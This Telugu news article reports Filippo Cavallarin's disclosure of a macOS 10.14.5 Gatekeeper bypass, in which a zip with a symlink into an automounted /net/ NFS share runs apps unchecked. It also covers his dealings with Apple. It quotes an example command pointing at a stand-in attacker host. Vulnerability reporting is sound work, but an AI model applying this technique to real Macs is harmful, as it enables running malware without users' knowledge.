భద్రతా పరిశోధకుడు Filippo Cavallarin తన బ్లాగ్లో macOS 10.14.5లోని బగ్ గురించి హెచ్చరికను పోస్ట్ చేసారు. ఇది గేట్కీపర్ యొక్క భద్రతా చర్యలను పూర్తిగా దాటవేసే అవకాశాన్ని కలిగి ఉంటుంది. Cavallarin ప్రకారం, అతను ఇప్పటికే ఈ సంవత్సరం ఫిబ్రవరిలో ఆపిల్కు లోపాన్ని ఎత్తి చూపాడు, అయితే తాజా నవీకరణలో కంపెనీ దాన్ని పరిష్కరించలేదు.
గేట్కీపర్ను Apple అభివృద్ధి చేసింది మరియు 2012లో మొదటిసారిగా దాని డెస్క్టాప్ ఆపరేటింగ్ సిస్టమ్లో చేర్చబడింది. ఇది వినియోగదారు యొక్క జ్ఞానం మరియు సమ్మతి లేకుండా అప్లికేషన్ను అమలు చేయకుండా నిరోధించే ఒక మెకానిజం. మీరు యాప్ను డౌన్లోడ్ చేసిన తర్వాత, సాఫ్ట్వేర్ Apple ద్వారా సరిగ్గా సంతకం చేయబడిందో లేదో చూడటానికి గేట్కీపర్ దాని కోడ్ను స్వయంచాలకంగా తనిఖీ చేస్తుంది.
తన బ్లాగ్ పోస్ట్లో, గేట్కీపర్, డిఫాల్ట్గా, బాహ్య నిల్వ మరియు నెట్వర్క్ షేర్లు రెండింటినీ సురక్షిత స్థానాలుగా పరిగణిస్తున్నట్లు కావల్లరిన్ పేర్కొన్నాడు. ఈ లక్ష్యాలలో నివసించే ఏదైనా అప్లికేషన్ కాబట్టి గేట్కీపర్ చెక్ ద్వారా వెళ్లకుండా స్వయంచాలకంగా ప్రారంభించబడుతుంది. వినియోగదారుకు తెలియకుండానే హానికరమైన సాఫ్ట్వేర్ను ప్రారంభించేందుకు ఈ లక్షణాన్ని ఉపయోగించుకోవచ్చు.
అనధికార ప్రాప్యతను అనుమతించే ఒక అంశం ఆటోమౌంట్ ఫీచర్, ఇది "/net/"తో ప్రారంభమయ్యే మార్గాన్ని పేర్కొనడం ద్వారా నెట్వర్క్ షేర్ను స్వయంచాలకంగా మౌంట్ చేయడానికి వినియోగదారులను అనుమతిస్తుంది. ఒక ఉదాహరణగా, Cavallarin "ls /net/evil-attacker.com/sharedfolder/" మార్గాన్ని ఉదహరించారు, దీని వలన ఆపరేటింగ్ సిస్టమ్ "షేర్ఫోల్డర్" ఫోల్డర్ యొక్క కంటెంట్లను రిమోట్ లొకేషన్లో లోడ్ చేస్తుంది, అది హానికరమైనది కావచ్చు.
వీడియోలో బెదిరింపు ఎలా పని చేస్తుందో మీరు చూడవచ్చు:
ఆటోమౌంట్ ఫంక్షన్కు దారితీసే నిర్దిష్ట సిమ్లింక్ని కలిగి ఉన్న జిప్ ఆర్కైవ్ భాగస్వామ్యం చేయబడితే, అది గేట్కీపర్ ద్వారా తనిఖీ చేయబడదు అనే వాస్తవం మరొక అంశం. ఈ విధంగా, బాధితుడు హానికరమైన ఆర్కైవ్ను సులభంగా డౌన్లోడ్ చేసుకోవచ్చు మరియు దానిని అన్జిప్ చేయవచ్చు, దాడి చేసే వ్యక్తి వినియోగదారుకు తెలియకుండా Macలో వాస్తవంగా ఏదైనా సాఫ్ట్వేర్ను అమలు చేయడానికి అనుమతిస్తుంది. డిఫాల్ట్గా నిర్దిష్ట పొడిగింపులను దాచే ఫైండర్, ఈ దుర్బలత్వంలో దాని వాటాను కూడా కలిగి ఉంది.
ఈ సంవత్సరం ఫిబ్రవరి 22న MacOS ఆపరేటింగ్ సిస్టమ్ యొక్క దుర్బలత్వంపై Apple దృష్టిని ఆకర్షించిందని Cavallarin తన బ్లాగ్లో పేర్కొన్నాడు. కానీ మే మధ్యలో, ఆపిల్ కావల్లారిన్తో కమ్యూనికేట్ చేయడం ఆపివేసింది, కాబట్టి కావల్లరిన్ మొత్తం విషయాన్ని బహిరంగపరచాలని నిర్ణయించుకున్నాడు.
మూలం: FCVL